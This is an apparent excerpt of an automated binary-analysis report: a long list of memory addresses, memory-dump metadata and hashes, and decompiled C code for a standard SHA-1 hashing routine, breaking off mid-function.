                                    0x006a6c9a
                                    0x006a6c9b
                                    0x006a6c9d
                                    0x006a6ca5
                                    0x006a6ca7
                                    0x006a6ca9
                                    0x006a6cab
                                    0x006a6cad
                                    0x006a6cae
                                    0x006a6cb0
                                    0x006a6cb2
                                    0x006a6cb4
                                    0x006a6cb5
                                    0x006a6cba
                                    0x006a6cbc
                                    0x006a6cc2
                                    0x006a6cc4
                                    0x006a6cc5
                                    0x006a6cc6
                                    0x006a6cc8
                                    0x006a6cca
                                    0x006a6ccb
                                    0x006a6ccc
                                    0x006a6cd0
                                    0x006a6cd1
                                    0x006a6cd3
                                    0x006a6cd5
                                    0x006a6cdc
                                    0x006a6cdd
                                    0x006a6cdf
                                    0x00000000
                                    0x006a6cdf
                                    0x006a6cba
                                    0x006a6bf4
                                    0x006a6bf4
                                    0x00000000
                                    0x006a6bf4
                                    0x006a6b90
                                    0x006a6b90
                                    0x006a6b92
                                    0x006a6b94
                                    0x006a6b95
                                    0x006a6b99
                                    0x006a6b9c
                                    0x006a6b9e
                                    0x006a6ba1
                                    0x006a6ba2
                                    0x00000000
                                    0x006a6ba2
                                    0x006a6b8e
                                    0x006a6b87
                                    0x006a6b0e
                                    0x006a6b0e
                                    0x006a6b10
                                    0x006a6b16
                                    0x006a6b18
                                    0x006a6b1e
                                    0x006a6b20
                                    0x006a6b23
                                    0x006a6b25
                                    0x006a6b27
                                    0x006a6b29
                                    0x006a6b2b
                                    0x006a6b2d
                                    0x006a6b30
                                    0x006a6b31
                                    0x006a6b33
                                    0x006a6b35
                                    0x006a6b37
                                    0x006a6b39
                                    0x006a6b3b
                                    0x006a6b3c
                                    0x006a6b3e
                                    0x006a6b42
                                    0x006a6b43
                                    0x006a6b48
                                    0x006a6ba6
                                    0x006a6ba6
                                    0x006a6b4a
                                    0x006a6b4a
                                    0x00000000
                                    0x006a6b4c
                                    0x006a6b48
                                    0x006a6ae4
                                    0x006a6ae4
                                    0x006a6ae6
                                    0x006a6ae6
                                    0x006a6ae9
                                    0x006a6b4d
                                    0x006a6b4d
                                    0x006a6b4e
                                    0x006a6b4f
                                    0x00000000
                                    0x006a6aeb
                                    0x006a6aeb
                                    0x006a6aed
                                    0x006a6aef
                                    0x006a6af0
                                    0x006a6af4
                                    0x006a6af7
                                    0x006a6af9
                                    0x006a6afc
                                    0x006a6afd
                                    0x006a6b01
                                    0x006a6b01
                                    0x006a6b01
                                    0x006a6ae9
                                    0x006a6ae2
                                    0x006a6a6d
                                    0x006a6a6d
                                    0x00000000
                                    0x006a6a6d
                                    0x006a6a09
                                    0x006a6a09
                                    0x006a6a0b
                                    0x006a6a0d
                                    0x006a6a0e
                                    0x006a6a10
                                    0x006a6a12
                                    0x006a6a15
                                    0x006a6a17
                                    0x006a6a18
                                    0x006a6a1a
                                    0x006a6a1b
                                    0x00000000
                                    0x006a6a1b
                                    0x006a6a07
                                    0x006a6a00
                                    0x006a6987
                                    0x006a6987
                                    0x006a6989
                                    0x006a698f
                                    0x006a6991
                                    0x006a6997
                                    0x006a6999
                                    0x006a699c
                                    0x006a699e
                                    0x006a69a0
                                    0x006a69a2
                                    0x006a69a4
                                    0x006a69a6
                                    0x006a69a9
                                    0x006a69aa
                                    0x006a69ac
                                    0x006a69ae
                                    0x006a69b0
                                    0x006a69b2
                                    0x006a69b4
                                    0x006a69b5
                                    0x006a69b7
                                    0x006a69b9
                                    0x006a69bb
                                    0x006a69bc
                                    0x006a69c1
                                    0x006a6a1f
                                    0x006a6a1f
                                    0x006a69c3
                                    0x006a69c3
                                    0x00000000
                                    0x006a69c5
                                    0x006a69c1
                                    0x006a695d
                                    0x006a695d
                                    0x006a695f
                                    0x006a695f
                                    0x006a6962
                                    0x006a69c6
                                    0x006a69c6
                                    0x006a69c7
                                    0x006a69c8
                                    0x00000000
                                    0x006a6964
                                    0x006a6964
                                    0x006a6966
                                    0x006a6968
                                    0x006a6969
                                    0x006a696d
                                    0x006a6970
                                    0x006a6972
                                    0x006a6973
                                    0x006a6975
                                    0x006a6976
                                    0x006a697a
                                    0x006a697a
                                    0x006a697a
                                    0x006a6962
                                    0x006a695b
                                    0x006a68e6
                                    0x006a68e6
                                    0x006a68e8
                                    0x006a68eb
                                    0x006a68ed
                                    0x006a68ef
                                    0x006a68f1
                                    0x006a68f7
                                    0x006a68f9
                                    0x006a68fc
                                    0x006a68fe
                                    0x006a68ff
                                    0x006a6901
                                    0x006a6904
                                    0x006a6905
                                    0x006a6907
                                    0x00000000
                                    0x006a6907
                                    0x006a68e4
                                    0x006a683c
                                    0x006a683c
                                    0x00000000
                                    0x006a683e
                                    0x006a683a
                                    0x006a67d6
                                    0x006a67d6
                                    0x006a67d8
                                    0x006a67d8
                                    0x006a67db
                                    0x006a683f
                                    0x006a683f
                                    0x006a6840
                                    0x006a6841
                                    0x00000000
                                    0x006a67dd
                                    0x006a67dd
                                    0x006a67df
                                    0x006a67e1
                                    0x006a67e2
                                    0x006a67e4
                                    0x006a67e6
                                    0x006a67e9
                                    0x006a67eb
                                    0x006a67ec
                                    0x006a67ee
                                    0x006a67ef
                                    0x006a67f1
                                    0x00000000
                                    0x006a67f1
                                    0x006a67db
                                    0x006a67d4
                                    0x006a67cf
                                    0x006a6d18
                                    0x006a6d19
                                    0x006a6d1e
                                    0x006a6d7c
                                    0x006a6d7c
                                    0x006a6d7d
                                    0x006a6d82
                                    0x006a6d84
                                    0x006a6d86
                                    0x006a6d89
                                    0x006a6d8b
                                    0x006a6d8e
                                    0x006a6d92
                                    0x006a6d95
                                    0x006a6d97
                                    0x006a6d98
                                    0x006a6d9a
                                    0x006a6d9b
                                    0x006a6da0
                                    0x00000000
                                    0x006a6da2
                                    0x006a6da2
                                    0x006a6da4
                                    0x006a6da6
                                    0x006a6da8
                                    0x006a6dab
                                    0x00000000
                                    0x006a6dab
                                    0x006a6d20
                                    0x006a6d20
                                    0x006a6d26
                                    0x006a6d28
                                    0x006a6d29
                                    0x006a6d2a
                                    0x006a6d2c
                                    0x006a6d2e
                                    0x006a6d2f
                                    0x006a6d30
                                    0x006a6d34
                                    0x006a6d35
                                    0x006a6d39
                                    0x006a6d3a
                                    0x006a6d3c
                                    0x006a6d3e
                                    0x006a6d40
                                    0x006a6d41
                                    0x006a6d43
                                    0x006a6d45
                                    0x006a6d46
                                    0x006a6d48
                                    0x006a6d4a
                                    0x006a6d4c
                                    0x006a6d4e
                                    0x006a6d50
                                    0x006a6d52
                                    0x006a6d54
                                    0x006a6d56
                                    0x006a6d58
                                    0x006a6d59
                                    0x006a6d5b
                                    0x006a6d5c
                                    0x006a6dac
                                    0x006a6dac
                                    0x006a6dae
                                    0x006a6db1
                                    0x006a6db5
                                    0x006a6db6
                                    0x006a6dba
                                    0x006a6dbb
                                    0x006a6dbd
                                    0x006a6dbf
                                    0x006a6dc5
                                    0x006a6dc7
                                    0x006a6dcd
                                    0x006a6dcf
                                    0x006a6dd1
                                    0x006a6dd4
                                    0x006a6dd7
                                    0x006a6ddf
                                    0x006a6de2
                                    0x006a6de5
                                    0x006a6de7
                                    0x006a6de9
                                    0x006a6deb
                                    0x006a6dee
                                    0x006a6df0
                                    0x006a6df1
                                    0x006a6df3
                                    0x006a6df4
                                    0x006a6df9
                                    0x006a6e57
                                    0x006a6e57
                                    0x006a6e59
                                    0x006a6e5b
                                    0x006a6e5c
                                    0x006a6e5d
                                    0x006a6e5f
                                    0x006a6e61
                                    0x006a6e62
                                    0x006a6e63
                                    0x006a6e67
                                    0x006a6e68
                                    0x006a6e70
                                    0x006a6e71
                                    0x006a6e77
                                    0x006a6e79
                                    0x006a6e7f
                                    0x006a6e81
                                    0x006a6e83
                                    0x006a6e85
                                    0x006a6e86
                                    0x006a6e88
                                    0x006a6e89
                                    0x006a6e91
                                    0x006a6e94
                                    0x006a6e97
                                    0x006a6e99
                                    0x006a6e9b
                                    0x006a6e9d
                                    0x00000000
                                    0x006a6e9f
                                    0x006a6e9f
                                    0x006a6ea7
                                    0x006a6ea8
                                    0x006a6eaa
                                    0x006a6ead
                                    0x006a6eaf
                                    0x00000000
                                    0x006a6eaf
                                    0x006a6dfb
                                    0x006a6dfb
                                    0x006a6dfd
                                    0x006a6dfe
                                    0x006a6e00
                                    0x006a6e02
                                    0x006a6e03
                                    0x006a6e04
                                    0x006a6e06
                                    0x006a6e08
                                    0x006a6e09
                                    0x006a6e0a
                                    0x006a6e0e
                                    0x006a6e0f
                                    0x006a6e14
                                    0x006a6e16
                                    0x006a6e18
                                    0x006a6e1e
                                    0x006a6e20
                                    0x006a6e26
                                    0x006a6e28
                                    0x006a6e2a
                                    0x006a6e2d
                                    0x006a6e30
                                    0x006a6e38
                                    0x006a6e3b
                                    0x006a6e3e
                                    0x006a6e40
                                    0x006a6e42
                                    0x006a6e44
                                    0x006a6e47
                                    0x006a6e49
                                    0x006a6e4c
                                    0x006a6e4d
                                    0x006a6e52
                                    0x006a6eb0
                                    0x006a6eba
                                    0x006a6ebc
                                    0x006a6ec2
                                    0x006a6ec4
                                    0x006a6f13
                                    0x006a6f13
                                    0x006a6f16
                                    0x006a6f1a
                                    0x006a6f1c
                                    0x006a6f1e
                                    0x006a6f21
                                    0x006a6f23
                                    0x006a6f25
                                    0x006a6ec6
                                    0x006a6ec6
                                    0x006a6ec8
                                    0x006a6eca
                                    0x006a6ecc
                                    0x006a6ece
                                    0x006a6ed5
                                    0x006a6ed7
                                    0x006a6ed9
                                    0x006a6edb
                                    0x006a6edd
                                    0x006a6edf
                                    0x006a6ee1
                                    0x006a6ee4
                                    0x006a6ee6
                                    0x006a6ee9
                                    0x006a6eeb
                                    0x006a6eed
                                    0x006a6eed
                                    0x006a6eef
                                    0x006a6ef1
                                    0x006a6ef4
                                    0x006a6ef6
                                    0x006a6ef8
                                    0x006a6efc
                                    0x006a6efe
                                    0x006a6f03
                                    0x006a6f07
                                    0x006a6f09
                                    0x006a6f0b
                                    0x006a6f0e
                                    0x006a6f10
                                    0x006a6f12
                                    0x00000000
                                    0x006a6f12
                                    0x006a6ed7
                                    0x006a6e54
                                    0x006a6e54
                                    0x006a6e56
                                    0x00000000
                                    0x006a6e56
                                    0x006a6e52
                                    0x006a6d5e
                                    0x006a6d5e
                                    0x006a6d60
                                    0x006a6d62
                                    0x006a6d64
                                    0x006a6d66
                                    0x006a6d68
                                    0x006a6d6a
                                    0x006a6d6c
                                    0x006a6d70
                                    0x006a6d70
                                    0x006a6d72
                                    0x006a6d74
                                    0x006a6d76
                                    0x006a6d78
                                    0x006a6d7a
                                    0x00000000
                                    0x006a6d7a
                                    0x006a6d5c
                                    0x006a6f26
                                    0x006a6f28
                                    0x006a6f2c
                                    0x006a6f2d
                                    0x006a6f2f
                                    0x006a6f31
                                    0x006a6f33
                                    0x006a6f35
                                    0x006a6f37
                                    0x006a6f39
                                    0x006a6f3b
                                    0x006a6f3d
                                    0x006a6f3f
                                    0x006a6f40
                                    0x006a6f41
                                    0x006a6f43
                                    0x006a6f44
                                    0x006a6f8d
                                    0x006a6f8d
                                    0x006a6f8f
                                    0x006a6f91
                                    0x006a6f93
                                    0x006a6f96
                                    0x006a6f98
                                    0x006a6f9b
                                    0x006a6f9c
                                    0x006a6fa0
                                    0x006a6fa2
                                    0x006a6fa6
                                    0x006a6fa8
                                    0x006a6fa9
                                    0x006a6fad
                                    0x006a6faf
                                    0x006a6fb1
                                    0x006a6fb2
                                    0x006a6f46
                                    0x006a6f46
                                    0x006a6f48
                                    0x006a6f4a
                                    0x006a6f4b
                                    0x006a6f4d
                                    0x006a6f4f
                                    0x006a6f52
                                    0x006a6f54
                                    0x006a6f7e
                                    0x006a6f7e
                                    0x006a6f7f
                                    0x006a6f81
                                    0x006a6f83
                                    0x006a6f85
                                    0x006a6f8b
                                    0x00000000
                                    0x006a6f56
                                    0x006a6f56
                                    0x006a6f57
                                    0x006a6f59
                                    0x006a6f5a
                                    0x006a6f5c
                                    0x006a6f67
                                    0x006a6f69
                                    0x006a6f6a
                                    0x00000000
                                    0x006a6f6c
                                    0x006a6f6c
                                    0x006a6f6e
                                    0x006a6f71
                                    0x006a6f73
                                    0x006a6f75
                                    0x006a6f76
                                    0x006a6fce
                                    0x006a6fd0
                                    0x006a6fd3
                                    0x006a6fd5
                                    0x006a6fd9
                                    0x006a6fda
                                    0x006a6fde
                                    0x006a6fe1
                                    0x006a6fe6
                                    0x006a6fea
                                    0x006a6fec
                                    0x006a6fed
                                    0x006a6fef
                                    0x006a6ff1
                                    0x006a6ff4
                                    0x006a6ff5
                                    0x006a6ff7
                                    0x006a6ff8
                                    0x006a6ffa
                                    0x006a6ffd
                                    0x006a6fff
                                    0x006a7001
                                    0x006a7003
                                    0x006a7006
                                    0x006a7008
                                    0x006a700a
                                    0x006a700e
                                    0x006a7013
                                    0x006a7017
                                    0x006a7019
                                    0x006a701a
                                    0x006a701c
                                    0x006a7025
                                    0x006a7027
                                    0x006a702a
                                    0x006a702c
                                    0x006a702e
                                    0x006a7032
                                    0x006a7034
                                    0x006a7036
                                    0x006a7039
                                    0x006a703b
                                    0x006a703d
                                    0x006a703e
                                    0x006a7041
                                    0x006a7046
                                    0x006a704a
                                    0x006a704c
                                    0x006a704d
                                    0x006a7051
                                    0x006a7053
                                    0x006a7055
                                    0x006a7057
                                    0x006a7058
                                    0x006a705a
                                    0x006a705d
                                    0x006a705f
                                    0x006a7061
                                    0x006a7062
                                    0x006a7065
                                    0x006a7069
                                    0x006a706c
                                    0x006a706e
                                    0x006a7070
                                    0x006a7071
                                    0x006a7074
                                    0x006a7079
                                    0x006a707b
                                    0x006a707d
                                    0x006a707f
                                    0x006a7083
                                    0x006a7084
                                    0x006a7086
                                    0x006a7088
                                    0x006a708a
                                    0x006a708b
                                    0x006a708f
                                    0x006a7091
                                    0x006a7093
                                    0x006a7095
                                    0x006a709b
                                    0x006a70a1
                                    0x006a70a3
                                    0x006a70a7
                                    0x006a70a8
                                    0x006a70aa
                                    0x006a70af
                                    0x006a70b3
                                    0x006a70b5
                                    0x006a70b6
                                    0x006a70b7
                                    0x006a70b9
                                    0x006a70bb
                                    0x006a70bc
                                    0x006a70bd
                                    0x006a70bf
                                    0x006a70c2
                                    0x006a70c4
                                    0x006a70c8
                                    0x006a70cc
                                    0x006a70ce
                                    0x006a70d0
                                    0x006a7128
                                    0x006a7128
                                    0x006a7129
                                    0x006a712b
                                    0x006a712e
                                    0x006a7130
                                    0x006a7132
                                    0x006a7134
                                    0x006a7138
                                    0x006a713b
                                    0x006a713d
                                    0x006a7140
                                    0x006a7142
                                    0x006a7148
                                    0x006a714a
                                    0x006a714b
                                    0x006a714d
                                    0x006a714f
                                    0x006a7151
                                    0x00000000
                                    0x006a7151
                                    0x006a70d2
                                    0x006a70d2
                                    0x006a70d4
                                    0x006a70d6
                                    0x006a70d9
                                    0x006a70db
                                    0x006a70dd
                                    0x006a70de
                                    0x006a70df
                                    0x006a70e1
                                    0x006a70e4
                                    0x006a70e6
                                    0x006a70e9
                                    0x006a70eb
                                    0x006a70ed
                                    0x006a70ef
                                    0x006a70f1
                                    0x006a70f3
                                    0x006a70f5
                                    0x006a70f7
                                    0x006a70f8
                                    0x006a70fa
                                    0x006a70fb
                                    0x006a7153
                                    0x006a7153
                                    0x006a7155
                                    0x006a7159
                                    0x006a7159
                                    0x006a715c
                                    0x006a715e
                                    0x006a7160
                                    0x006a7162
                                    0x006a7164
                                    0x006a7166
                                    0x006a7168
                                    0x006a716c
                                    0x006a716c
                                    0x006a716f
                                    0x006a7171
                                    0x006a7173
                                    0x006a7176
                                    0x006a7178
                                    0x006a717b
                                    0x006a717d
                                    0x006a717f
                                    0x006a7181
                                    0x006a7183
                                    0x006a7186
                                    0x006a7188
                                    0x006a70fd
                                    0x006a70fd
                                    0x006a70ff
                                    0x006a7101
                                    0x006a7103
                                    0x006a7105
                                    0x006a7107
                                    0x006a7109
                                    0x006a710b
                                    0x006a710d
                                    0x006a710d
                                    0x006a7110
                                    0x006a7112
                                    0x006a7114
                                    0x006a7117
                                    0x006a7119
                                    0x006a711b
                                    0x006a711c
                                    0x006a711d
                                    0x006a711f
                                    0x006a7122
                                    0x006a7124
                                    0x006a7126
                                    0x00000000
                                    0x006a7126
                                    0x006a70fb
                                    0x006a718a
                                    0x006a7190
                                    0x006a7192
                                    0x006a7194
                                    0x006a7197
                                    0x006a719d
                                    0x006a719f
                                    0x006a71a1
                                    0x006a71a7
                                    0x006a71aa
                                    0x006a71ad
                                    0x006a71af
                                    0x006a71b1
                                    0x006a71b7
                                    0x006a71b9
                                    0x006a71bd
                                    0x006a71be
                                    0x006a71c0
                                    0x006a71c2
                                    0x006a71c3
                                    0x006a71c5
                                    0x006a71c7
                                    0x006a71cd
                                    0x006a71ce
                                    0x006a71d0
                                    0x006a71d2
                                    0x006a71d4
                                    0x006a71d6
                                    0x006a71da
                                    0x006a71db
                                    0x006a71e1
                                    0x006a71e7
                                    0x006a71e8
                                    0x006a71e8
                                    0x006a71ee
                                    0x006a71ef
                                    0x006a71f1
                                    0x006a71f3
                                    0x006a71f5
                                    0x006a71f6
                                    0x006a71f7
                                    0x006a71f8
                                    0x006a71fa
                                    0x006a71fc
                                    0x006a71fe
                                    0x006a7200
                                    0x006a7206
                                    0x006a720c
                                    0x006a720c
                                    0x006a720f
                                    0x006a7211
                                    0x006a7217
                                    0x006a7219
                                    0x006a721b
                                    0x006a721d
                                    0x006a721f
                                    0x006a7221
                                    0x006a7223
                                    0x006a7226
                                    0x006a7228
                                    0x006a722a
                                    0x006a722c
                                    0x006a722e
                                    0x006a7289
                                    0x006a7289
                                    0x006a728b
                                    0x006a728d
                                    0x006a728f
                                    0x006a7292
                                    0x006a7294
                                    0x006a7296
                                    0x006a7298
                                    0x006a729a
                                    0x006a729c
                                    0x006a72a2
                                    0x006a72a3
                                    0x006a72a5
                                    0x006a72a7
                                    0x006a72aa
                                    0x006a72ac
                                    0x00000000
                                    0x006a72ac
                                    0x006a7230
                                    0x006a7230
                                    0x006a7236
                                    0x006a7237
                                    0x006a7239
                                    0x006a723b
                                    0x006a723e
                                    0x006a7240
                                    0x006a7242
                                    0x006a7244
                                    0x006a7246
                                    0x006a7248
                                    0x006a724a
                                    0x006a724c
                                    0x006a724e
                                    0x006a7250
                                    0x006a7252
                                    0x006a72ae
                                    0x006a72ae
                                    0x006a72b0
                                    0x006a72b2
                                    0x006a72b4
                                    0x006a72b6
                                    0x006a72b8
                                    0x006a72bd
                                    0x006a72c0
                                    0x006a72c6
                                    0x006a72c7
                                    0x006a72c9
                                    0x006a72cb
                                    0x006a72ce
                                    0x006a72d0
                                    0x006a72d2
                                    0x00000000
                                    0x006a7254
                                    0x006a7254
                                    0x006a725a
                                    0x006a725b
                                    0x006a725d
                                    0x006a725f
                                    0x006a7262
                                    0x006a7264
                                    0x006a7266
                                    0x006a7268
                                    0x006a726a
                                    0x006a726c
                                    0x006a726e
                                    0x006a7270
                                    0x006a7272
                                    0x006a7274
                                    0x006a7276
                                    0x006a72d3
                                    0x006a72d3
                                    0x006a72d5
                                    0x006a72d7
                                    0x006a72da
                                    0x006a72dc
                                    0x006a72e4
                                    0x006a72ea
                                    0x006a72eb
                                    0x006a72ed
                                    0x006a72f2
                                    0x006a72f4
                                    0x006a72f6
                                    0x006a7278
                                    0x006a7278
                                    0x006a727e
                                    0x006a727f
                                    0x006a7281
                                    0x006a7283
                                    0x006a7286
                                    0x006a7288
                                    0x00000000
                                    0x006a7288
                                    0x006a7276
                                    0x006a7252
                                    0x006a72f8
                                    0x006a72fa
                                    0x006a72fc
                                    0x006a6f78
                                    0x006a6f78
                                    0x006a6f7a
                                    0x006a6f7c
                                    0x006a6f7d
                                    0x00000000
                                    0x006a6f7d
                                    0x006a6f76
                                    0x006a6f6a
                                    0x006a6f54

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.765744750.00000000006A2000.00000002.00020000.sdmp, Offset: 006A0000, based on PE: true
                                    • Associated: 00000007.00000002.765720003.00000000006A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000007.00000002.766354813.0000000000792000.00000002.00020000.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d292bed960a06bea762b1b291b0f6078c40eabc9ea435c021bd55608cf60a01b
                                    • Instruction ID: 237b509116203dc32a5806c59794309ab986ccbb44411ef6a6c46a6d1a15f44a
                                    • Opcode Fuzzy Hash: d292bed960a06bea762b1b291b0f6078c40eabc9ea435c021bd55608cf60a01b
                                    • Instruction Fuzzy Hash: 28E2375144E7C24FCB03AB785C712D1BF72AE5322475E95C7C4C08F4A3EA19599AEB32
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409E40, Relevance: 1.7, Strings: 1, Instructions: 423COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E00409E40(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
					_t459 =  *(_t278 - 0x14);
					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
					_t278[8] = _t357;
					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
					_t278 =  &(_t278[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t278[6] = _t318 ^ _t399;
					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
				} while ( *_t46 != 0);
				_t320 =  *_t481;
				_t279 = _t481[1];
				_t358 = _t481[2];
				_t404 = _t481[3];
				_v12 = _t320;
				_v16 = _t481[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t462 = _v8;
					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t323 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t404;
					_v12 = _t488;
					asm("rol esi, 0x5");
					_v8 = _t358;
					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t491 = _t279;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t362 = _v12;
					_v8 = _t323;
					_t325 = _v8;
					_v12 = _t410;
					asm("rol edx, 0x5");
					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t413 = _v12;
					_v16 = _t491;
					asm("ror ecx, 0x2");
					_v8 = _t362;
					_v12 = _t285;
					asm("rol eax, 0x5");
					_v16 = _t325;
					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t358 = _v12;
					_t288 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t413;
					_v12 = _t496;
					asm("rol esi, 0x5");
					_v16 = _t288;
					_t279 = _v12;
					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t404 = _v8;
					asm("ror ecx, 0x2");
					_t463 = _t462 + 5;
					_t320 = _t499;
					_v12 = _t320;
					_v8 = _t463;
				} while (_t463 < 0x14);
				_t464 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t404;
					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t334 = _v12;
					_v12 = _t502;
					asm("rol esi, 0x5");
					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t505 = _t279;
					_v16 = _t358;
					_t365 = _v12;
					_v12 = _t420;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t423 = _v12;
					_v8 = _t334;
					_v8 = _t365;
					_v12 = _t292;
					asm("rol eax, 0x5");
					_t464 = _t464 + 5;
					_t358 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t505 + 0x6ed9eba1; // 0x6ed9eb9f
					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
					_t295 = _v8;
					_v8 = _t423;
					_v12 = _t506;
					asm("rol esi, 0x5");
					_t404 = _v8;
					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
					_v16 = _t295;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
				} while (_t464 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t404;
					asm("ror eax, 0x2");
					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
					_t470 = _v12;
					_v12 = _t510;
					asm("rol esi, 0x5");
					_t340 = _v8;
					asm("ror edi, 0x2");
					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
					_v16 = _t358;
					_t369 = _v12;
					_v12 = _t432;
					asm("rol edx, 0x5");
					_v8 = _t279;
					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t299 = _v12;
					_v8 = _t470;
					_v12 = _t434;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t437 = _t369;
					_t358 = _v12;
					_v8 = _t437;
					_v12 = _t522;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
					_t404 = _t299;
					_t279 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t499;
					_t341 = _t340 + 5;
					_v8 = _t341;
				} while (_t341 < 0x3c);
				_t478 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t479 = _v8;
					asm("ror eax, 0x2");
					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
					_t346 = _v12;
					_v16 = _t404;
					_v12 = _t525;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
